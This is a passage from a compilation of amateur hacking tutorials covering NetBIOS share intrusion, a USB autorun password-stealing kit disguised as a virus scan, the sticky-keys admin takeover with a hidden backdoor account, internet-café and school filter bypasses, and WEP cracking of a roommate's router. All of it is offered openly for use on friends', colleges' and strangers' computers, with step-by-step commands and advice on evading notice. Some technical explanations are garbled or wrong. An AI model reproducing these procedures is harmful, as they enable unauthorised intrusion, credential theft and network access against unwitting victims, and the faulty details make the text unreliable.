not get it or you are not using mIRC then you must direct connect to their computer
or you may use a sniffer to figure out his IP or host name. It's actually better to do
it without the sniffer because most sniffers do not work now-a-days. So you want to
establish a direct connection to their computer. OK, what is a direct connection?
When you are:
Sending a file to their computer you are directly connected.
AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.
ICQ when sending a file or a chat request acception allows a direct connection.
Any time you are sending a file. You are directly connected. (Assuming you know the
user is not using a proxy server.)
Voice Chatting on Yahoo establishes a direct connection.
If you have none of these programs, either i suggest you get one, get a sniffer, or
read this next statement.
If you have any way of sending thema link to your site that enables site traffic
statistics, and you can log in, send a link to your site, then check the stats and get
the IP of the last visitor. It's a simple and easy method i use. It even fool some
smarter hackers, because it catches them off guard. Anyway, once you are directly
connected use either of the two methods i showed you earlier and get into DOS. Type
NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It
will show you all computers connected to yours. (This is also helpful if you think you
are being hacked by a trojan horse and is on a port that you know such as Sub Seven:
27374.)Your screen should look like this showing the connections to your computer:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
The first line indicated the Protocol (language) that is being used by the two
computers.
TCP (Transfer Control Protocol) is being used in this and is most widely used.
Local address shows your IP address, or the IP address of the system you on.
Foreign address shows the address of the computer connected to yours.
State tells you what kind of connection is being made ESTABLISHED - means it will
stay connected to you as long as you are on the program or as long as the computer is
allowing or is needing the other computers connection to it. CLOSE_WAIT means the
connection closes at times and waits until it is needed or you resume connection to be
made again. One that isn't on the list is TIME_WAIT which means it is timed. Most
Ads that run on AOL are using TIME_WAIT states.
the way you know the person is directly connected to your computer is because of
this:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
Notice the host name is included in the fourth line instead of the IP address on all.
This is almost ALWAYS, the other computer that is connected to you. So here, now,
you have the host name:
abc-123-ppp.webnet.com
If the host name is not listed and the IP is then it NO PROBLEM because either one
works exactly the same. I am using abc-123-ppp.webnet.com host name as an example.
Ok so now you have the IP and/or host name of the remote system you want to
connect to. Time to hack!
Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's
the crap again. Well, now time to try out what you have leanred from this document
by testing it on the IP and/or host name of the remote system. Here's the only thing
you'll need to know.
IMPORTANT, READ NOW!!!
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Remember this?
Time to use it.
-a will be the host name
-A will be the IP
How do i know this?
Read the Statements following the -a -A commands. It tells you there what each
command takes.
So have you found which one you have to use?
GOOD!
Time to start.
 
6. Using it to your advantage
Type this if you have the host name only.
NBTSTAT -a (In here put in hostname without parenthesis)
Type this is you have the IP address only.
NBTSTAT -A (In here put in IP address without parenthesis)
Now, hit enter and wait. Now Either one of two things came up
1. Host not found
2. Something that looks like this:
--------------------------------------------
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
---------------------------------------------
If the computer responded "Host not found" Then either one of two things are the
case:
1. You screwed up the host name.
2. The host is not hackable.
If number one is the case you're in great luck. If two, This system isn't hackable
using the NBTSTAT command. So try another system.
If you got the table as above to come up, look at it carefully as i describe to you each
part and its purpose.
Name - states the share name of that certain part of the computer
<00>, <03>, <20>, <1E> - Are the Hexidecimal codes giving you the services available on
that share name.
Type - Is self-explanatory. It's either turned on, or activated by you, or always on.
Status - Simply states that the share name is working and is activated.
Look above and look for the following line:
GMVPS01 <20> UNIQUE Registered
See it?
GOOD! Now this is important so listen up. The Hexidecimanl code of <20> means that
file sharing is enabled on the share name that is on that line with the hex number. So
that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's
How to do it. (This is the hard part)
 
7. LMHOST File.
There is a file in all Windows systems called LMHOST.sam. We need to simply add
the IP into the LMHOST file because LMHOST basically acts as a network,
automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in
LMHOST and hit enter. when it comes up open it using a text program such as
wordpad, but make sure you do not leave the checkmark to "always open files with
this extension" on that. Simply go through the LMHOST file until you see the part:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmans
erver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
Read this over and over until you understand the way you want your connection to be
set. Here's an example of how to add an IP the way I would do it:
#PRE #DOM:255.102.255.102 #INCLUDE
Pre will preload the connection as soon as you log on to the net. DOM is the domain or
IP address of the host you are connecting to. INCLUDE will automaticall set you to
that file path. In this case as soon as I log on to the net I will get access to
255.102.255.102 on the C:/ drive. The only problem with this is that by doin the
NETSTAT command while you are connected, and get the IP of your machine. That's
why it only works on simple PC machines. Because people in these days are computer
illiterate and have no idea of what these commands can do. They have no idea what
NETSTAT is, so you can use that to your advantage. Most PC systems are kind of
hard to hack using this method now because they are more secure and can tell when
another system is trying to gain access. Also, besure that you (somehow) know
whether they are running a firewall or not because it will block the connection to
their computer. Most home systems aren't running a firewall, and to make it better,
they don't know how operate the firewall, therefore, leaving the hole in the system.
To help you out some, it would be a great idea to pick up on some programming
languages to show you how the computer reads information and learn some things on
TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out
whether they are running a firewall, simply hop on a Proxy and do a port scan on their
IP. You will notice if they are running a firewall because most ports are closed. Either
way, you still have a better chance of hacking a home system than hacking Microsoft.
 
8.Gaining Access
Once you have added this to you LMHOST file. You are basically done. All you need
to do is go to:
Start
Find
Computer
Once you get there you simply type the IP address or the host name of the system.
When it comes up, simply double click it, and boom! There's a GUI for you so you
don't have to use DOS anymore. You can use DOS to do it, but it's more simple and
fun this way, so that's the only way i put it. When you open the system you can edit,
delete, rename, do anything to any file you wish. I would also delete the command file
in C:/ because they may use it if they think someone is in their computer. Or simply
delete the shortcut to it. Then here's when the programming comes in handy. Instead
of using the NBTSTAT method all the time, you can then program you own trojan on
your OWN port number and upload it to the system. Then you will have easier access
and you will also have a better GUI, with more features. DO NOT allow more than one
connection to the system unless they are on a faster connection. If you are
downloading something from their computer and they don't know it and their
connection is being slow, they may check their NETSTAT to see what is connected,
which will show your IP and make them suspicious. Thats it. All there is to it. Now go
out and scan a network or something and find a computer with port 21 or something
open.


How to Hack passwords using USB Drive

Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend’s/college Computer.
We need the following tools to create our rootkit:
 
MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
 
Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.
 
IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0
 
Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…
 
PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.
------------------------------------- ------------------------------------------------------
Here is a step by step procedre to create the password hacking toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
 
1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.
 
2. Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
 
3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend’s PC or on your college computer. Just follow these steps

 
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).
 
2. In the pop-up window, select the first option (Perform a Virus Scan).
 
3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.

How To Hack An Administrator Account With A Guest Account

 The only way this is going to work is if your account has permission to mody files in folder
«system32»)
Ever wanted to hack your college pc with guest account/student account so that you
can download with full speed Hack Administrator !!!!there ? or just wanted to hack
your friend’s pc to make him gawk when you tell your success story of hacking ?
well,there is a great way of hacking an administrator account from a guest account by
which you can reset the administrator password and getting all the privilages an
administrator enjoys on windows.. Interested ? read on…

Concept
Press shift key 5 times and the sticky key dialog shows up.This works even at the
logon screen. But If we replace the sethc.exe which is responsible for the sticky key
dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon
screen,we will get a command prompt with administrator privilages because no user
has logged on. From there we can hack the administrator password,even from a guest
account.

Prerequisites
Guest account with write access to system 32.
Here is how to do that -


* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the
file,then click yes.
When asked to overwrite, overwrite the sethc.exe.
* Now Log out from your guest account and at the user select window,press shift key
5 times.
* Instead of Sticky Key confirmation dialog,command prompt with full administrator
privileges will open.




















Press shift key 5 times and command prompt will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password
you like and press enter.
* You will see “ The Command completed successfully” and then exit the command
prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.

 Further..
Also, you can further create a new user at the command prompt by typing “NET USER
Ephemeral /ADD” where “Ephemeral” is the username you would like to add with
administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Here create a new DWORD value, write its name as the “user name” that u created
for your admin account and live with your admin account forever :)

Thursday 1 November 2012

How to get unlimited time in Internet Café's

Today we're going to learn how to disable the timer on the computers in Internet
Cafe's.
Let's go through the steps, shall we?

1. Create a New Text Document.

2. Then type CMD in it.

3. And then save it as anything.bat
(Make sure the file do NOT end on .txt, but on .bat)

4. Go to the location were you saved the .bat file and run it. If you've done this
correctly, you'll see that Command Prompt is open.

5. Now that Command Prompt is open, type in: cd\windows
(This will change the directory to Windows)

6. Then type in: regedit
(This will get you to the registry editor gui)

7. Now navigate to:
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current
version>internet settings>policies>system


8. Then on the right pane where it says Disable Taskmanager, right click on it, and
scroll down to modify, and than change the value of it to "0".

9. And then open Windows Task Manager
(CTRL+ALT+DELETE)

10. And then disable the Internet Cafe's timer.
If you did this right, then you're done! Well done :D

How to get past your school blocking system without programs

Right, first off, you need to go onto:http://g.ho.st/
This is a virtual machine/ computer that your sysadmins shouldn't have blocked. At
my school, our security is pretty high because of people like me and you. After you
are on the website, it should look like this:

 Ok, now you click on the big button that says: Start. Then, after that, you should see
another screen that looks like this:
















Now make an account, you should see the register button. I have made an account,
(trust me, it is easy). After you have logged in, you should see another screen that
looks something like this:
















After you have got logged in, you should try and get on the g.ho.st internet (alpha), to
get on the internet, follow these commands.
on the desktop, click on the icon that says: find cool web stuff.
Then click the icon that says: Web.
Now go to: Ghost services.
And there should be a icon that says: G.ho.st browser (alpha).
(If you go on a website, and it says: open in a new tab because this site will function
better, (or something like that) don't do it. But if you want to, just do it).

How To Crack WEP In Linux

Im using Ubutnu 8.10, but all the commands are compatible with all other Linux Distros.

1. Open terminal
Sudo -s
(Enter Password)
apt-get install aircrack-ng (Here shows lots of cool shenanigans in verbose mood, just
enjoy)
Note: it might prompt you with something like "this file will take 8995kb.. do u wish
to install [Y/N]" (Correct Answer Being Y for yes)
Alright, you have just installed aircrack-ng on your computer, congratulations!

2. Ifconfig wlan0 down
this command puts your wireless card into "monitor mode." if this line doesnt work
for you, try "ifconfig ath0 down" or the connection type you are using. im going to
continue using wlan0 as that applies to me, you will just replace wlan0 with your
specific device code.
OR iwconfig wlan0 mode monitor if neither of the above work for you. once again,
depends on your computer.

3. Your goal now is to find your target, my goal is my roommates wireless router which
is using WEP encryption, how convenient!
first, for educational purposes, type airodump-ng into terminal, this shows all the
commands airodump is capable of, very important if you want to go after something a
tad different or specific
We want to find the target, type airodump-ng --showack wlan0







                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                 We see that the target Essid is "Rob and Big" the encryption type is WEP, the
BSSID number is "00:22:15:23:6E:E2", and finally the channel number is 11

you must know the enemy well if you want to hack it successfully.

know that we know all this very important information, we shall begin our attack!
airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0
holy shnap! that was alot!, here is what we just did.

-w ->saves all the important stuff to a file (first being the file name)
--showack ->shows some cool information, idk, i like it just cause its always changing,
not really necessary
--berlin 3000 -> keeps the cool numbers on the screen even longer, like i said, not
totally important, but defiantly looks cool! (3000 being the time the numbers are kept
on the screen)
--bssid ->defines to the program what bssid (the router) you want to specifically
capture packets from
-C -> Defines what channel the program to stay on (instead of surfing all 12, it just
monitors one now)

wow! amazing, tons of cool numbers pop up and entertain us! whooo hooo!
what is actually happening is that the program is capturing packets and saving them to
the file you defined above (First)

so break out a can of chef boyardee and chow away, cause its going to be awhile.

You are actually wanting for the number under #Data at the time to reach ~ 10000
to 100000, the more data is being transfered over the network, the faster this will
go.
---
Dude! that number is not going up very fast / or, very very very slow!
Skip to the bottom, i will explain and how to 'fix that'
--
Fantastic! you have ~ 10000 packets and a full stomach, what now?
you have all this information, now you need to decipher it (more commonly know as
'cracking')

KEEP THE AIRODUMP-NG TERMINAL OPEN!
open a new terminal and type
sudo -s
(enter password)
aircrack-ng -a 1 -b 00:22:15:23:6E:E2 First.cab
Cool! what did i just do?
aircrack-ng -> cracking program, can crack WEP and WPA passcodes
-a -> Set the attack mode to WEP (2 is WPA)
-b -> is the network we are attacking (the bssid is 00:22:15:23:6E:E2)
First.cab -> the file airodump saved all the important shenagians to. (note, the
program automatically saves the file as *.cab file)

wait..
wait..
wait..

BAM! the password! Congratulations, you have just won the game.

or

plz collect 5000 more packets, (this is why you left airodump-ng open.) aircrack-ng
will automatically re-attempt to crack again after airodump-ng has collected 5000
more packets. so more chef boyardee, and some more patience...
---

#Data is going slooowwwwwwwww!!! HELP ME!
this is because the user is not actively using the network, you have a choice, wait till
he starts using the network again or 'assist' the network on giving you the packets
you need.

now, this is going to be quite a hassel, but stick with it.
apt-get install macchanger

stop the airodump-ng from working. (i just hit ctrl+c and it stops)
ifconfig wlan0 down

>> the top half of the screen of the terminal of the airodump tell you the network you
are gathering packets for, the bottom half lists mac addresses. important!

with the picture above, im going to use the mac address 00:22:3F:7B:D5:2C
so, macchanger -m 00:22:3F:7B:D5:2C wlan0

Now, your mac address is the same as a computer already accepted by the router!
oooo... awwwww..
now, we get to play with a program called aireplay-ng!
aireplay-ng -3 -b 00:22:15:23:6E:E2 -h 00:22:3F:7B:D5:2C wlan0

--What just happened?
aireplay-ng works buy injecting packets into the router so u get more traffic btwn
the computers. (speeds up the packet retrieval on the airodump-ng side)
-3 is the attack type '00:22:3F:7B:D5:2C' i just explained what i did above
-b is the enemy bssid '00:22:15:23:6E:E2'
-h is your spoofed (faked) mac addresss '00:22:3F:7B:D5:2C'

now, it will start injecting packets.. now start up airodump again and wait some more!
airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0
(just in case you lost it)

WOW! that, is how to crack a WEP key. i hoped you enjoyed this tut.

How to Crack a WEP Encrypted Wireless Network on Windows Vista

First you can only use this method to crack a WEP encrypted network. WEP has been
replaced by WPA encryption which is stronger but can still be cracked, just not as
easily. To find out if the network you want to crack is WEP encryption, simply view
the wireless networks in the Connect to a network box and hold your mouse over the
network of choice. A little box will tell you the encryption. If it say WEP - good we
can proceed, if it says anything else this tutorial wont help.

First to understand what you will be doing. You will be using a program to capture
packets and then use another program to analyze those packets and crack the key,
thus allowing you to have access to their network. To capture packets (data from the
network we are trying to crack) you must have the program running on your computer
and you must capture about 200 000 or more IV packets (a special type of packet). I
will show you how to capture the correct type of packets.
 
Also ONLY certain types of wireless cards can actually capture wireless packets. In
order to capture packets your wireless card must be able to go into monitor mode,
not every driver or every wireless card supports monitor mode. In most cases you will
have to download a special driver designed for your wireless card to put it into
monitor mode. I had to purchase a new wireless card because mine was not supported.
The program you will be using has a list of supported wireless cards and comes with
the drivers needed (Lucky you)
 
Ok, down to business. First the program you need to capture packets can be
downloaded from this link http://www.tamos.com/download/main/ca.php
 
Next the program to analyze the packets and finger out the password can be
downloaded from my own site. I got it to work for windows vista and then zipped it all
into a folder for you. To get this to run all you have to do is extract it, open the
aircrack folder, then open the bin folder, then double click on Aircrack-ng GUI.exe.
Here is the download link http://www.howtovideos.ca/images/aircrackVista.rar just
click it and save the file.
 
Now for the dirty work, keep in mind this could take a few days to capture enough
packets. First install the Commview for Wifi program. You do this by extracting the
setup file from the file we downloaded earlier (ca6.zip) Then double click setup.exe
and follow the prompts. When Commview opens for the first time it has a driver
installations guide. This replaces the old driver with a newer, better, and more
improved version! Hooray. Follow the prompts to install your new driver and now we
are ready to capture. If everything has gone as planned when you open Commview for
Wifi the little play button in the top left corner will be blue. If it is not blue the
driver has not been installed properly. Moving on…

Click the blue button in the top left corner and then click Start Scanning. Commview
for Wifi now starts scanning each channel looking for data that is being sent. It will
list each network it finds. Now click each host until you find the name of the network
key you are trying to find. Now select the appropriate channel (my network is
broadcasting on channel 6 so I will start capturing all data on channel 6) Click
capture.

Commview for Wifi is now capturing all the packets being sent over channel 6. Once
Commview for Wifi collects enough packets aircrack can analyze them and crack the
wireless key. The thing is, you only need certain packets, and if you collect too many
unneeded packets aircrack may get confused. To help make things easier follow the
next few steps.

First of all we only want packets from one host, not all of them. As you can see from
my screenshot below I am collecting packets from 7 different network. (see
screenshot below)A few are WPA encrypted so they and a few are WEP. I really only
want to collect data being sent from one network, so in order to do this all you have
to do is right click on the wireless network you want to crack and select copy mac
address.

Now click on the rules tab. On the left side under simple rules click MAC Addresses.
For action select Capture, and for Add Record select both. Now click inside the entry
form box and hit ctrl+v (to paste the mac address) or right click and select paste.
Now hit add MAC Address.

What we just did is make a rule so that Commview for Wifi will only capture packets
coming from a certain MAC Address (the one we want) Great almost done.

Now to make things even easier for Aircrack you only want to capture DATA packets.
There are 3 types to select from Management packets, Data Packets and Control
Packets. We only want Data packets because that is where the information is that
Aircrack needs to crack the wireless encryption passkey. Simply select the D, and
unselect the M and the C.

Now Commview for Wifi is only capturing Data Packets. To be more specific
Commview for Wifi is only capturing Data Packets to and from a specific MAC
address. Now that everything is set up to capture the right types of packets we
should start saving the logs.

You have to save all of the packets into a log for Aircrack to analyze them. You can
set Commview for Wifi to save them automatically, or just save them yourself
periodically. It is a good idea to have them auto save because it splits them into nicely
sized logs, and if you accidentally close Commview for Wifi they will save and you
wont lose all your packets! To do that just go to the logging tab and enable auto
saving. You can change the settings if you would like (I recommend increasing the
maximum directory size to something like 100000).

And now we wait… We have to capture over 15000 IV packets. Because we set up
some rules most of the packets we capture will be IV packets (these are a certain
type of Data packet with information used to crack the wireless key). It took me
about 4 days to capture enough packets, but I was not running Commview for Wifi non
stop. If you are close to the network and there is heavy traffic, it may only take you
a few hours. Ok what do you do now?
Alright, so now 20000 packets (or more) later we are ready to crack the WEP
wireless key. First lets converts all of the log files to .cap format (shown in
screenshot below) When I cracked my first WEP key with this method I had 4 log
files and about 220 000 packets.Go to wherever you have your log files saved and
double click to open it. Now click on file -> Export Logs -> Tcpdump Format

Save it as 1.cap do the rest of your logs, saving them in sequential order 1.cap, 2.cap,
3.cap etc.
Now that you have all of your log files saved in .cap format lets open Aircrack. Open
the aircrack folder (wherever you extracted it) then open the Bin folder, now double
click Aircrack-ng GUI.exe. Aircrack will open, click the choose button and navigate to
where you have your log files saved. To select all of your log files ( saved in .cap
format) Hold down CTRL and click each file, Then hit open.
Now click launch, Aircrack shows you all of the different BSSID’s that it captured
data from and assigns an index number to each one, then it asks you Index number of
target network? You want to enter the number of the network you want to crack.
Mine is called CrackMePlease so I am selecting 15.
Enter the index number and then press enter, if you have enough IV’s then it should
give you the WEP key. If not go back and capture more and try again.
That’s all